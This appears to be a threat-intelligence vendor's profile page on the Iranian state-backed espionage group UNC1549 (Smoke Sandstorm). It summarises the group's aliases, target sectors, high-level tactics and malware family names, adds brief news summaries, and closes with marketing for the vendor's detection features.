Smoke Sandstorm
UNC1549 is an Iranian state-backed cyber-espionage group, with high-confidence links to the Islamic Revolutionary Guard Corps (IRGC) and significant overlap with the Tortoiseshell group. The group is also tracked as Imperial Kitten (CrowdStrike), GalaxyGato (ESET), Subtle Snail, Nimbus Manticore, and Smoke Sandstorm. Active since at least early 2024, UNC1549 primarily targets aerospace, aviation, and defense sectors across the Middle East, Israel, the US, UAE, Qatar, Spain, and Saudi Arabia, but has also expanded to technology, hospitality, finance, and transportation sectors. UNC1549 employs spear-phishing (often with job-themed lures), supply chain attacks, and credential theft for initial access, frequently leveraging compromised third-party suppliers to bypass robust defenses. The group uses a sophisticated malware arsenal, including custom tools such as Twostroke (C++ backdoor), Deeproot, Crashpad, Dcsyncer.slick (Active Directory hash extraction), Ghostline, Pollblend (tunneling), Sightgrab (screenshots), Trusttrap (credential theft via pop-ups), and Lightrail. They also abuse code-signing certificates (notably from SSL.com) to sign malware, drastically reducing detection rates. UNC1549 mimics legitimate software from vendors like FortiGate, Microsoft, Nvidia, Citrix, and VMWare, and sometimes installs legitimate software to load malicious binaries. The group uses DLL search order hijacking, SSH reverse tunnels, and deletes forensic artifacts to evade detection and maintain long-term persistence, with backdoors that can remain dormant for months. UNC1549's operations are characterized by strategic intelligence gathering, theft of sensitive data (emails, IP, network documentation), and support for Iran's military and geopolitical objectives, including missile and drone program advancements and sanctions circumvention. The group is highly adaptive, anticipating incident response and ensuring persistence even after remediation attempts. Their activities are part of a broader Iranian cyber campaign targeting critical infrastructure and supporting covert procurement networks. Known sub-groups and aliases include Tortoiseshell, Subtle Snail, Nimbus Manticore, and Smoke Sandstorm.
Know when an actor pivots toward your sector
Mallory correlates actor tradecraft and target patterns against your stack, your sector, and your geography. See overlap before they land.
Recent activity
5 sources tracked across advisories, community write-ups, and news. New activity surfaces here as Mallory finds it.
UNC1549 (Nimbus Manticore) is an Iranian cyber-espionage group targeting aerospace, aviation, and defense sectors.
UNC1549 is an Iranian state-sponsored threat actor known for targeting aerospace, aviation, and defense industries in the Middle East. The group has evolved its operations by deploying multiple custom malware variants and advanced post-exploitation techniques to maintain persistence and evade detection.
UNC1549 is conducting espionage campaigns targeting aerospace, aviation, and defense organizations, as well as expanding to technology, hospitality, finance, and transportation sectors. The group uses spear-phishing, supply chain attacks, and custom malware to steal sensitive information, intellectual property, and credentials, primarily for strategic intelligence gathering aligned with Iranian interests.
UNC1549 is an Iranian cyber espionage group linked to Charming Kitten APT, known for using code-signing certificates from SSL.com to sign malware, making it harder to detect. They have targeted European organizations with backdoors and infostealers, leveraging fraudulent or impersonated companies to acquire valid certificates.
The version that knows your environment.
Match sector + geo + tech-stack targeting against your real footprint.
Every observed MITRE ATT&CK technique, grouped by tactic.
Families this actor is known to deploy, with IOCs and behavior.
CVEs this actor has used in known campaigns.
YARA, Sigma, Snort, and vendor rules, auto-deployed to your SIEM.
Domains, IPs, and hashes tied to this actor, refreshed continuously.